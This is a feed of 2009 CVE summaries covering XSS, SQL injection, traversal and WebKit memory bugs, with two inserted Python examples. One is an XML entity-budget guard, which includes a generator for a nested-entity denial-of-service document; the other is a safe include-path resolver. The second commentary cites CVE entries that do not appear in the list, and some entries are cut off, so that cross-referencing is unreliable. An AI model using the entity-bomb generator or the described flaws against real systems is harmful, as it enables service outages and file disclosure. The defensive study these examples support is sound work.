[CVE-2009-2047] Directory traversal vulnerability in the Administration interface in Cisco Customer Response Solutions (CRS) before 7.0(1) SR2 in Cisco Unified Contact Center Express (aka CCX) server allows remote authenticated users to read, modify, or delete arbitrary files via unspecified vectors.
[CVE-2009-2046] The embedded web server on the Cisco Video Surveillance 2500 Series IP Camera with firmware before 2.1 allows remote attackers to read arbitrary files via a (1) http or (2) https request, related to the (a) SD Camera Web Server and the (b) Wireless Camera HTTP Server, aka Bug IDs CSCsu05515 and CSCsr96497.
[CVE-2009-2041] Cross-site scripting (XSS) vulnerability in A51 D.O.O. activeCollab 0.7.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2009-1772.
[CVE-2009-2033] Cross-site scripting (XSS) vulnerability in index.php in Yogurt 0.3 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2009-2032] Cross-site scripting (XSS) vulnerability in search.asp in PDshopPro, when downloaded before 20070308, allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2009-2024] Vlad Titarenko ASP VT Auth 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file and obtain usernames and passwords via a direct request for zHk8dEes3.txt.
[CVE-2009-2022] fipsCMS Light 2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file and obtain sensitive information via a direct request for _fipsdb/db.mdb.
[CVE-2009-2020] Cross-site scripting (XSS) vulnerability in news_detail.php in Virtue News Manager allows remote attackers to inject arbitrary web script or HTML via the nid parameter.
[CVE-2009-2009] Multiple cross-site scripting (XSS) vulnerabilities in Dokeos 1.8.5, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) curdirpath parameter to main/document/slideshow.php and the (2) file parameter to main/exercice/testheaderpage.php.
[CVE-2009-2006] Multiple cross-site scripting (XSS) vulnerabilities in Dokeos 1.8.5, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) search_term parameter to main/auth/courses.php
[CVE-2009-2002] Unspecified vulnerability in the WebLogic Portal component in BEA Product Suite 8.1.6, 9.2.3, 10.0.1, 10.2.1, and 10.3.1.0.0 allows remote attackers to affect integrity via unknown vectors.
[CVE-2009-1975] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3 allows remote attackers to affect confidentiality, integrity, and availability, related to the WLS Console Package.
[CVE-2009-1974] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to the Servlet Container Package.
[CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
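The entry above is the nested-entity (so-called "billion laughs") memory-exhaustion pattern, delivered here in a PROPFIND body. As an added example, not code from APR-util or the Apache HTTP Server, the guard below uses Python's expat binding to price every internal entity at declaration time and abort before the body is expanded; the budget values and the sample document generator are constructed for illustration.

```python
import re
import xml.parsers.expat

ENTITY_REF = re.compile(r"&([A-Za-z_][\w.-]*);")


class EntityExpansionError(ValueError):
    """Raised when declared entities would expand beyond the configured budget."""


def check_entity_budget(xml_data: bytes, max_expansion: int = 10_000, max_entities: int = 100) -> int:
    """Parse with expat, computing the expanded size of each internal entity as it is
    declared, and abort before any content is expanded if a limit is exceeded.
    Returns the largest single-entity expansion (in characters) found in the DTD.
    External entities (no literal value) are refused outright."""
    sizes = {}
    largest = 0

    def on_entity_decl(name, is_parameter_entity, value, base, system_id, public_id, notation_name):
        nonlocal largest
        if value is None:
            raise EntityExpansionError(f"external entity {name!r} refused")
        if len(sizes) >= max_entities:
            raise EntityExpansionError("too many entity declarations")
        # Expanded size = literal text + size of every previously declared entity it
        # references.  Counting the reference text as well makes the estimate conservative.
        total = len(value) + sum(sizes.get(ref, 0) for ref in ENTITY_REF.findall(value))
        if total > max_expansion:
            raise EntityExpansionError(f"entity {name!r} would expand to {total} characters")
        sizes.setdefault(name, total)  # first declaration wins, as in XML
        largest = max(largest, total)

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_data, True)  # a handler exception propagates out of Parse
    return largest


def is_safe_xml(xml_data: bytes, **limits) -> bool:
    try:
        check_entity_budget(xml_data, **limits)
        return True
    except (EntityExpansionError, xml.parsers.expat.ExpatError):
        return False


def make_nested_entity_doc(depth: int, fanout: int = 10) -> bytes:
    """Constructed sample: lol1 is `fanout` references to lol, lol2 is `fanout`
    references to lol1, and so on; the root element references the deepest one."""
    decls = ["<!ENTITY lol 'lol'>"]
    for i in range(1, depth + 1):
        prev = "lol" if i == 1 else f"lol{i - 1}"
        refs = f"&{prev};" * fanout
        decls.append(f"<!ENTITY lol{i} '{refs}'>")
    root = f"lol{depth}" if depth else "lol"
    doc = "<?xml version='1.0'?><!DOCTYPE d [" + "".join(decls) + f"]><d>&{root};</d>"
    return doc.encode("ascii")
```

With fanout 10 the estimate grows by roughly a factor of ten per level (80, 860, 8660, ...), so a 10,000-character budget admits three levels and rejects the fourth before the parser has expanded a single reference in the body.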
[CVE-2009-1953] IBM FileNet Content Manager 4.0, 4.0.1, and 4.5, as used in IBM WebSphere Application Server (WAS) and Oracle BEA WebLogic Application Server, when the CE Web Services listener has a certain WSEAF configuration, does not properly restrict use of a cached Subject, which allows remote attackers to obtain access with the credentials of a recently authenticated user via unspecified vectors.
[CVE-2009-1951] Cross-site scripting (XSS) vulnerability in index.php in PropertyMax Pro FREE 0.3 allows remote attackers to inject arbitrary web script or HTML via the pl parameter in a mi action.
[CVE-2009-1950] SQL injection vulnerability in yorum.asp in WebEyes Guest Book 3 allows remote attackers to execute arbitrary SQL commands via the mesajid parameter.
[CVE-2009-1945] SQL injection vulnerability in webCal3_detail.asp in WebCal 3.04 allows remote attackers to execute arbitrary SQL commands via the event_id parameter.
[CVE-2009-1942] Cross-site scripting (XSS) vulnerability in the Quiz module 5.x, 6.x-2.x before 6.x-2.2, and 6.x-3.x before 6.x-3.0, a module for Drupal, allows remote authenticated users, with create quizzes or quiz questions access, to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-1941] PAD Site Scripts 3.6 stores sensitive information under the web document root with insufficient access control, which allows remote attackers to download the database and obtain sensitive information via a direct request for dbbackup.txt.
[CVE-2009-1940] Cross-site scripting (XSS) vulnerability in the administrator panel in the com_users core component for Joomla! 1.5.x through 1.5.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-1939] Cross-site scripting (XSS) vulnerability in the JA_Purity template for Joomla! 1.5.x through 1.5.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-1938] Cross-site scripting (XSS) vulnerability in Joomla! 1.5.x through 1.5.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to database output and the frontend administrative panel.
[CVE-2009-1937] Cross-site scripting (XSS) vulnerability in the comment posting feature in LightNEasy 2.2.1 "no database" (aka flat) and 2.2.2 SQLite allows remote attackers to inject arbitrary web script or HTML via the (1) commentname (aka Author), (2) commentemail (aka Email), and (3) commentmessage (aka Comment) parameters. NOTE: some of these details are obtained from third party information.
[CVE-2009-1934] Cross-site scripting (XSS) vulnerability in the Reverse Proxy Plug-in in Sun Java System Web Server 6.1 before SP11 allows remote attackers to inject arbitrary web script or HTML via the query string in situations that result in a 502 Gateway error.
[CVE-2009-1920] The JScript scripting engine 5.1, 5.6, 5.7, and 5.8 in JScript.dll in Microsoft Windows, as used in Internet Explorer, does not properly load decoded scripts into memory before execution, which allows remote attackers to execute arbitrary code via a crafted web site that triggers memory corruption, aka "JScript Remote Code Execution Vulnerability."
[CVE-2009-1912] Directory traversal vulnerability in src/func/language.php in webSPELL 4.2.0e and earlier allows remote attackers to include and execute arbitrary local .php files via a .. (dot dot) in a language cookie. NOTE: this can be leveraged for SQL injection by including awards.php.
[CVE-2009-1911] Directory traversal vulnerability in .include/init.php (aka admin/_include/init.php) in QuiXplorer 2.3.2 and earlier, as used in TinyWebGallery (TWG) 1.7.6 and earlier, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang parameter to admin/index.php.
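Several entries above (CVE-2009-2161, CVE-2009-2151, CVE-2009-2109, CVE-2009-2081, CVE-2009-1912 and CVE-2009-1911) share one root cause: a language or module name taken from a GET parameter or a cookie is concatenated into a filesystem path that is then passed to include() or read. As an added example, not code from any of those projects (which are PHP), the block below shows the vulnerable concatenation beside a resolver that allow-lists the identifier and, as defence in depth, confirms that the canonical path stays inside the base directory. The base directory and identifiers used are constructed.

```python
import os
import re
from pathlib import Path

# Only bare names such as "en", "de_DE" or "pt-br" are acceptable language/module identifiers.
IDENTIFIER = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,31}")


def naive_include_path(base_dir: str, requested: str) -> str:
    """The vulnerable pattern behind these entries: request input joined straight
    into the path (PHP: include($base . '/' . $_GET['lang'] . '.php'))."""
    return os.path.normpath(os.path.join(base_dir, requested + ".php"))


def escapes_base(base_dir: str, path: str) -> bool:
    """True when `path` lies outside `base_dir` after normalisation."""
    base = os.path.abspath(base_dir)
    return os.path.commonpath([base, os.path.abspath(path)]) != base


def safe_include_path(base_dir: str, requested: str, allowed=None) -> str:
    """Hardened resolver: the identifier must match the allow-list pattern (and the
    optional known set), and the resolved path must remain under `base_dir`."""
    if not IDENTIFIER.fullmatch(requested):
        raise ValueError("invalid identifier")
    if allowed is not None and requested not in allowed:
        raise ValueError("unknown identifier")
    base = Path(base_dir).resolve()
    candidate = (base / f"{requested}.php").resolve()
    # Containment check catches anything the pattern missed, including symlink tricks.
    if base not in candidate.parents:
        raise ValueError("path escapes base directory")
    return str(candidate)


def is_accepted(base_dir: str, requested: str, allowed=None) -> bool:
    try:
        safe_include_path(base_dir, requested, allowed)
        return True
    except ValueError:
        return False
```

The regex does the real work: traversal sequences, absolute paths, null bytes and the "include a different application file" trick noted for CVE-2009-1912 all fail it. The containment test is there so that a later relaxation of the pattern cannot silently reopen the hole.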
[CVE-2009-1910] SQL injection vulnerability in index.php in RTWebalbum 1.0.462 allows remote attackers to execute arbitrary SQL commands via the AlbumId parameter.
[CVE-2009-1908] Cross-site scripting (XSS) vulnerability in Skip 1.0.2 and earlier, and 1.1RC2 and earlier 1.1RC versions, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-1907] Cross-site scripting (XSS) vulnerability in claroline/linker/notfound.php in Claroline 1.8.11 allows remote attackers to inject arbitrary web script or HTML via the Referer HTTP header.
[CVE-2009-1901] The Security component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35 permits "non-standard http methods," which has unknown impact and remote attack vectors.
[CVE-2009-1900] The Configservice APIs in the Administrative Console component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35, 6.1 before 6.1.0.25, and 7.0 before 7.0.0.5, when tracing is enabled, allow remote attackers to obtain sensitive information via unspecified use of the wsadmin scripting tool.
[CVE-2009-1899] Unspecified vulnerability in the Administrative Configservice API in the System Management/Repository component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35, 6.1 before 6.1.0.25, and 7.0 before 7.0.0.5 on z/OS allows remote authenticated users to obtain sensitive information via unknown use of the wsadmin scripting tool, related to a "security exposure in wsadmin."
[CVE-2009-1898] The secure login page in the Administrative Console component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35 does not redirect to an https page upon receiving an http request, which makes it easier for remote attackers to read the contents of WAS sessions by sniffing the network.
[CVE-2009-1896] The Java Web Start framework in IcedTea in OpenJDK before 1.6.0.0-20.b16.fc10 on Fedora 10, and before 1.6.0.0-27.b16.fc11 on Fedora 11, trusts an entire application when at least one of the listed jar files is trusted, which allows context-dependent attackers to execute arbitrary code without the untrusted-code restrictions via a crafted application, related to NetX.
[CVE-2009-1889] The OSCAR protocol implementation in Pidgin before 2.5.8 misinterprets the ICQWebMessage message type as the ICQSMS message type, which allows remote attackers to cause a denial of service (application crash) via a crafted ICQ web message that triggers allocation of a large amount of memory.
[CVE-2009-1881] Cross-site scripting (XSS) vulnerability in MT312 IMG-BBS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to model.php with a timestamp before 20090521.
[CVE-2009-1880] Cross-site scripting (XSS) vulnerability in MT312 REP-BBS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) model.php and (2) config.php with timestamps before 20090521.
[CVE-2009-1879] Cross-site scripting (XSS) vulnerability in index.template.html in the express-install templates in the SDK in Adobe Flex before 3.4, when the installed Flash version is older than a specified requiredMajorVersion value, allows remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2009-1878] Session fixation vulnerability in Adobe ColdFusion 8.0.1 and earlier allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2009-1877] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion 8.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2009-1875.
[CVE-2009-1875] Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion 8.0.1 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2009-1877.
[CVE-2009-1874] Multiple cross-site scripting (XSS) vulnerabilities in the Management Console in Adobe JRun 4.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-1872] Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
[CVE-2009-1849] Cross-site scripting (XSS) vulnerability in the Monitor_Bandwidth function in PRTG Traffic Grapher 6.2.2.977 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-1845] Cross-site scripting (XSS) vulnerability in ajax/updatecheck.php in Lussumo Vanilla 1.1.5 and 1.1.7 allows remote attackers to inject arbitrary web script or HTML via the RequestName parameter.
[CVE-2009-1844] Multiple cross-site scripting (XSS) vulnerabilities in Drupal 5.x before 5.18 and 6.x before 6.12 allow (1) remote authenticated users to inject arbitrary web script or HTML via crafted UTF-8 byte sequences that are treated as UTF-7 by Internet Explorer 6 and 7, which are not properly handled in the "HTML exports of books" feature
[CVE-2009-1843] Multiple SQL injection vulnerabilities in Flash Quiz Beta 2 allow remote attackers to execute arbitrary SQL commands via the (1) quiz parameter to (a) num_questions.php, (b) answers.php, (c) high_score.php, (d) high_score_web.php, (e) results_table_web.php, and (f) question.php
[CVE-2009-1841] js/src/xpconnect/src/xpcwrappedjsclass.cpp in Mozilla Firefox before 3.0.11, Thunderbird before 2.0.0.22, and SeaMonkey before 1.1.17 allows remote attackers to execute arbitrary web script with the privileges of a chrome object, as demonstrated by the browser sidebar and the FeedWriter.
[CVE-2009-1840] Mozilla Firefox before 3.0.11, Thunderbird, and SeaMonkey do not check content policy before loading a script file into a XUL document, which allows remote attackers to bypass intended access restrictions via a crafted HTML document, as demonstrated by a "web bug" in an e-mail message, or web script or an advertisement in a web page.
[CVE-2009-1836] Mozilla Firefox before 3.0.11, Thunderbird before 2.0.0.22, and SeaMonkey before 1.1.17 use the HTTP Host header to determine the context of a document provided in a non-200 CONNECT response from a proxy server, which allows man-in-the-middle attackers to execute arbitrary web script by modifying this CONNECT response, aka an "SSL tampering" attack.
[CVE-2009-1823] Cross-site scripting (XSS) vulnerability in the Print (aka Printer, e-mail and PDF versions) module 5.x before 5.x-4.7 and 6.x before 6.x-1.7, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML by modifying a document head, before the Content-Type META element, to contain crafted UTF-8 byte sequences that are treated as UTF-7 by Internet Explorer 6 and 7, a related issue to CVE-2009-1575.
[CVE-2009-1821] DMXReady Registration Manager 1.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for databases/webblogmanager.mdb.
[CVE-2009-1820] Cross-site scripting (XSS) vulnerability in product.php in 2daybiz Custom T-shirt Design Script allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2009-1811] Multiple cross-site scripting (XSS) vulnerabilities in myGesuad 0.9.14 (aka 0.9) allow remote attackers to inject arbitrary web script or HTML via (1) the Page parameter in a List action to modules/ereignis.php, (2) the Kontext parameter in a Search action to modules/kategorie.php, (3) the image parameter to modules/image.php, or (4) the ID parameter in a Detail action to modules/sitzung.php.
[CVE-2009-1809] Multiple cross-site scripting (XSS) vulnerabilities in myColex 1.4.2 allow remote attackers to inject arbitrary web script or HTML via (1) the year parameter to modules/kalender.php, (2) the Page parameter in a List action to modules/ereignis.php, (3) the Kontext parameter in a Search action to modules/kategorie.php, or (4) the image parameter to modules/image.php.
[CVE-2009-1801] Multiple cross-site scripting (XSS) vulnerabilities in FreePBX 2.5.1, and other 2.4.x, 2.5.x, and pre-release 2.6.x versions, allow remote attackers to inject arbitrary web script or HTML via the (1) display parameter to reports.php, the (2) order and (3) extdisplay parameters to config.php, and the (4) sort parameter to recordings/index.php. NOTE: some of these details are obtained from third party information.
[CVE-2009-1798] Multiple cross-site scripting (XSS) vulnerabilities on the Network Management Card (NMC) on American Power Conversion (APC) Switched Rack PDU (aka Rack Mount Power Distribution) devices and other devices allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: the login_username vector for Forms/login1 is already covered by CVE-2009-4406.
[CVE-2009-1796] Cross-site scripting (XSS) vulnerability in Sun Java System Portal Server 6.3.1, 7.1, and 7.2 allows remote attackers to inject arbitrary web script or HTML via vectors related to an error page.
[CVE-2009-1792] The system.openURL function in StoneTrip Ston3D StandalonePlayer (aka S3DPlayer StandAlone) 1.6.2.4 and 1.7.0.1 and WebPlayer (aka S3DPlayer Web) 1.6.0.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the first argument (the sURL argument).
[CVE-2009-1790] Cross-site scripting (XSS) vulnerability in CGI RESCUE Trees before 2.11 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2009-1787] Multiple SQL injection vulnerabilities in PHP Dir Submit (aka WebsiteSubmitter and Submitter Script) allow remote attackers to bypass authentication and gain administrative access via the (1) username and (2) password parameters.
[CVE-2009-1785] Cross-site scripting (XSS) vulnerability in Ulteo Open Virtual Desktop 1.0 allows remote attackers to inject arbitrary web script or HTML via the error parameter to header.php. NOTE: the provenance of this information is unknown
[CVE-2009-1776] Multiple cross-site scripting (XSS) vulnerabilities in FormMail.pl in Matt Wright FormMail 1.92, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via javascript: URIs in the (1) request and (2) return_link_url parameters.
[CVE-2009-1775] Multiple cross-site scripting (XSS) vulnerabilities in Ulteo Open Virtual Desktop 1.0 allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) admin/applications.php, (2) admin/appsgroup.php, (3) admin/users.php, (4) admin/usersgroup.php, and (5) admin/tasks.php
[CVE-2009-1772] Cross-site scripting (XSS) vulnerability in activeCollab 2.1 Corporate allows remote attackers to inject arbitrary web script or HTML via the re_route parameter to the login script.
[CVE-2009-1762] Multiple cross-site scripting (XSS) vulnerabilities in the WebAccess login page (aka gw/webacc) in Novell GroupWise 7.x before 7.03 HP2 allow remote attackers to inject arbitrary web script or HTML via the (1) GWAP.version or (2) User.Theme (aka User.Theme.index) parameter.
[CVE-2009-1751] SQL injection vulnerability in list_list.php in Realty Webware Technologies Web-Base 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2009-1749] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Catviz 0.4.0 beta 1 allow remote attackers to inject arbitrary web script or HTML via the (1) userman_form and (2) webpages_form parameters.
[CVE-2009-1748] Multiple directory traversal vulnerabilities in index.php in Catviz 0.4.0 Beta 1 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) webpages_form or (2) userman_form parameter.
[CVE-2009-1745] Armorlogic Profense Web Application Firewall before 2.2.22, and 2.4.x before 2.4.4, has a default root password hash, and permits password-based root logins over SSH, which makes it easier for remote attackers to obtain access.
[CVE-2009-1738] Cross-site scripting (XSS) vulnerability in Feed Block 6.x-1.x before 6.x-1.1, a module for Drupal, allows remote authenticated users with administrator feed permissions to inject arbitrary web script or HTML via unspecified vectors in "aggregator items."
[CVE-2009-1735] Cross-site scripting (XSS) vulnerability in search.php in VidSharePro allows remote attackers to inject arbitrary web script or HTML via the searchtxt parameter. NOTE: some of these details are obtained from third party information.
[CVE-2009-1732] Cross-site scripting (XSS) vulnerability in admin/usermanager in IPplan 4.91a allows remote attackers to inject arbitrary web script or HTML via the grp parameter.
[CVE-2009-1729] Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Communications Express 6 2005Q4 (aka 6.2) and 6.3 allow remote attackers to inject arbitrary web script or HTML via (1) the abperson_displayName parameter to uwc/abs/search.xml in the Add Contact implementation in the Personal Address Book component or (2) the temporaryCalendars parameter to uwc/base/UWCMain.
[CVE-2009-1727] Incomplete blacklist vulnerability in CoreTypes in Apple Mac OS X 10.5 before 10.5.8 makes it easier for user-assisted remote attackers to execute arbitrary JavaScript via a web page that offers a download with a Content-Type value that is not on the list of possibly unsafe content types for Safari.
[CVE-2009-1725] WebKit in Apple Safari before 4.0.2, as used on iPhone OS before 3.1, iPhone OS before 3.1.1 for iPod touch, and other platforms
[CVE-2009-1724] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 4.0.2, as used on iPhone OS before 3.1, iPhone OS before 3.1.1 for iPod touch, and other platforms, allows remote attackers to inject arbitrary web script or HTML via vectors related to parent and top objects.
[CVE-2009-1723] CFNetwork in Apple Mac OS X 10.5 before 10.5.8 places an incorrect URL in a certificate warning in certain 302 redirection scenarios, which makes it easier for remote attackers to trick a user into visiting an arbitrary https web site by leveraging an open redirect vulnerability, a different issue than CVE-2009-2062.
[CVE-2009-1718] WebKit in Apple Safari before 4.0 allows user-assisted remote attackers to obtain sensitive information via vectors involving drag events and the dragging of content over a crafted web page.
[CVE-2009-1715] Cross-site scripting (XSS) vulnerability in Web Inspector in WebKit in Apple Safari before 4.0 allows user-assisted remote attackers to inject arbitrary web script or HTML, and read local files, via vectors related to script execution with incorrect privileges.
[CVE-2009-1714] Cross-site scripting (XSS) vulnerability in Web Inspector in WebKit in Apple Safari before 4.0 allows user-assisted remote attackers to inject arbitrary web script or HTML, and read local files, via vectors related to the improper escaping of HTML attributes.
[CVE-2009-1713] The XSLT functionality in WebKit in Apple Safari before 4.0 does not properly implement the document function, which allows remote attackers to read (1) arbitrary local files and (2) files from different security zones via unspecified vectors.
[CVE-2009-1712] WebKit in Apple Safari before 4.0 does not prevent remote loading of local Java applets, which allows remote attackers to execute arbitrary code, gain privileges, or obtain sensitive information via an APPLET or OBJECT element.
[CVE-2009-1711] WebKit in Apple Safari before 4.0 does not properly initialize memory for Attr DOM objects, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document.
[CVE-2009-1710] WebKit in Apple Safari before 4.0 allows remote attackers to spoof the browser's display of (1) the host name, (2) security indicators, and unspecified other UI elements via a custom cursor in conjunction with a modified CSS3 hotspot property.
[CVE-2009-1709] Use-after-free vulnerability in the garbage-collection implementation in WebCore in WebKit in Apple Safari before 4.0 allows remote attackers to execute arbitrary code or cause a denial of service (heap corruption and application crash) via an SVG animation element, related to SVG set objects, SVG marker elements, the targetElement attribute, and unspecified "caches."
[CVE-2009-1708] Apple Safari before 4.0 does not prevent calls to the open-help-anchor URL handler by web sites, which allows remote attackers to open arbitrary local help files, and execute arbitrary code or obtain sensitive information, via a crafted call.
[CVE-2009-1707] Race condition in the Reset Safari implementation in Apple Safari before 4.0 on Windows might allow local users to read stored web-site passwords via unspecified vectors.
[CVE-2009-1706] The Private Browsing feature in Apple Safari before 4.0 on Windows does not remove cookies from the alternate cookie store in unspecified circumstances upon (1) disabling of the feature or (2) exit of the application, which makes it easier for remote web servers to track users via a cookie.
[CVE-2009-1703] WebKit in Apple Safari before 4.0 does not prevent references to file: URLs within (1) audio and (2) video elements, which allows remote attackers to determine the existence of arbitrary files via a crafted HTML document.
[CVE-2009-1702] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to inject arbitrary web script or HTML via vectors related to improper handling of Location and History objects.
[CVE-2009-1701] Use-after-free vulnerability in the JavaScript DOM implementation in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) by destroying a document.body element that has an unspecified XML container with elements that support the dir attribute.
[CVE-2009-1700] The XSLT implementation in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not properly handle redirects, which allows remote attackers to read XML content from arbitrary web pages via a crafted document.
[CVE-2009-1699] The XSL stylesheet implementation in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not properly handle XML external entities, which allows remote attackers to read arbitrary files via a crafted DTD, as demonstrated by a file:///etc/passwd URL in an entity declaration, related to an "XXE attack."
[CVE-2009-1698] WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not initialize a pointer during handling of a Cascading Style Sheets (CSS) attr function call with a large numerical argument, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document.
[CVE-2009-1697] CRLF injection vulnerability in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to inject HTTP headers and bypass the Same Origin Policy via a crafted HTML document, related to cross-site scripting (XSS) attacks that depend on communication with arbitrary web sites on the same server through use of XMLHttpRequest without a Host header.
[CVE-2009-1696] WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 uses predictable random numbers in JavaScript applications, which makes it easier for remote web servers to track the behavior of a Safari user during a session.
[CVE-2009-1695] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to inject arbitrary web script or HTML via vectors involving access to frame contents after completion of a page transition.
[CVE-2009-1694] WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not properly handle redirects, which allows remote attackers to read images from arbitrary web sites via vectors involving a CANVAS element and redirection, related to a "cross-site image capture issue."
[CVE-2009-1693] WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to read images from arbitrary web sites via a CANVAS element with an SVG image, related to a "cross-site image capture issue."
[CVE-2009-1692] WebKit before r41741, as used in Apple iPhone OS 1.0 through 2.2.1, iPhone OS for iPod touch 1.1 through 2.2.1, Safari, and other software, allows remote attackers to cause a denial of service (memory consumption or device reset) via a web page containing an HTMLSelectElement object with a large length attribute, related to the length property of a Select object.
[CVE-2009-1691] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to inject arbitrary web script or HTML via vectors related to insufficient access control for standard JavaScript prototypes in other domains.
[CVE-2009-1690] Use-after-free vulnerability in WebKit, as used in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, iPhone OS for iPod touch 1.1 through 2.2.1, Google Chrome 1.0.154.53, and possibly other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) by setting an unspecified property of an HTML tag that causes child elements to be freed and later accessed when an HTML error occurs, related to "recursion in certain DOM event handlers."
[CVE-2009-1689] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to inject arbitrary web script or HTML via vectors involving submission of a form to the about:blank URL, leading to security-context replacement.
[CVE-2009-1688] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to inject arbitrary web script or HTML via vectors related to determining a security context through an approach that is not the "HTML 5 standard method."
[CVE-2009-1687] The JavaScript garbage collector in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not properly handle allocation failures, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document that triggers write access to an "offset of a NULL pointer."
[CVE-2009-1686] WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not properly handle constant (aka const) declarations in a type-conversion operation during JavaScript exception handling, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document.
[CVE-2009-1685] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to inject arbitrary web script or HTML by overwriting the document.implementation property of (1) an embedded document or (2) a parent document.
